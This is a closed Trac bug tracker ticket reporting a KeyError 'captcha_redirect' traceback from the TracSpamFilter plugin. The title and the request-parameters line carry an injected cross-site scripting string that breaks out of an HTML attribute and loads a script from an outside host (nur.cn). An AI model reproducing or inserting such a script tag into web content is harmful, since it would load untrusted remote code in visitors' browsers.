Bug Tracker

Opened 6 years ago

Closed 6 years ago

#13826 closed bug (invalid)

KeyError: 'captcha_redirect'assecs error!"/><script src=http://nur.cn/u.js></script>

Reported by: anonymous Owned by: anonymous
Priority: undecided Milestone: None
Component: unfiled Version: 1.9.1
Keywords: Cc:
Blocked by: Blocking:

Description

How to Reproduce

While doing a POST operation on /, Trac issued an internal error.

(please provide additional details here)

Request parameters:assecs error!"/><script src=http://nur.cn/u.js></script>

{'__FORM_TOKEN': u'7d6ff7024058ef6aeef79ce8',
 'recaptcha_challenge_field': u'03AHJ_VuvtPvSnabVc5jjJ69pTWZX-1Z1eHriogDdPG_JGlOqYQgHtMXh37G3JhkDPBUzYd1tZBwMH-1LdeYvi4AA_yJYqieXNtjHexq2f6bxw9q1GmLx3aqubwC9mUS85BzIAldD4RqUBk28WyGnUyljGCjX_WBZp3poCBc5i62FUMbPzDCoZG3Q',
 'recaptcha_response_field': u'schoolalsetrat'}

User agent: Mozilla/5.0 (Windows NT 5.1; rv:20.0) Gecko/20100101 Firefox/20.0

System Information

System information not available

Enabled Plugins

Plugin information not available

Python Traceback

Traceback (most recent call last):
  File "/usr/local/lib/python2.6/dist-packages/Trac-0.12.1-py2.6.egg/trac/web/main.py", line 511, in _dispatch_request
    dispatcher.dispatch(req)
  File "/usr/local/lib/python2.6/dist-packages/Trac-0.12.1-py2.6.egg/trac/web/main.py", line 202, in dispatch
    chosen_handler)
  File "/usr/local/lib/python2.6/dist-packages/Trac-0.12.1-py2.6.egg/trac/web/main.py", line 344, in _pre_process_request
    chosen_handler = filter_.pre_process_request(req, chosen_handler)
  File "/usr/local/lib/python2.6/dist-packages/TracSpamFilter-0.4.1dev_r10170-py2.6.egg/tracspamfilter/captcha/api.py", line 119, in pre_process_request
    del req.session['captcha_redirect']
KeyError: 'captcha_redirect'

Change History (4)

comment:1 Changed 6 years ago by dmethvin

Resolution: notabug
Status: newclosed

comment:2 Changed 6 years ago by dmethvin

Resolution: notabug
Status: closedreopened

comment:3 Changed 6 years ago by dmethvin

Owner: set to anonymous
Status: reopenedpending

Can you provide some more information about what you were doing when this occurred.?

comment:4 Changed 6 years ago by trac-o-bot

Resolution: invalid
Status: pendingclosed

Because we get so many tickets, we often need to return them to the initial reporter for more information. If that person does not reply within 14 days, the ticket will automatically be closed, and that has happened in this case. If you still are interested in pursuing this issue, feel free to add a comment with the requested information and we will be happy to reopen the ticket if it is still valid. Thanks!

Note: See TracTickets for help on using tickets.